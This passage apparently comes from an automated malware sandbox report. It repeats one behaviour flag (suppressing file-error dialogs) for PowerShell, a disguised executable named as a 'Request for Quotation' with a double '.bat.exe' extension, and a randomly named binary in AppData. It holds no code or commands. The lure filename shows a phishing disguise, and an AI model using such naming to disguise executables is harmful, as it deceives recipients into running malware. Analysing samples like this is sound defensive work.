                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
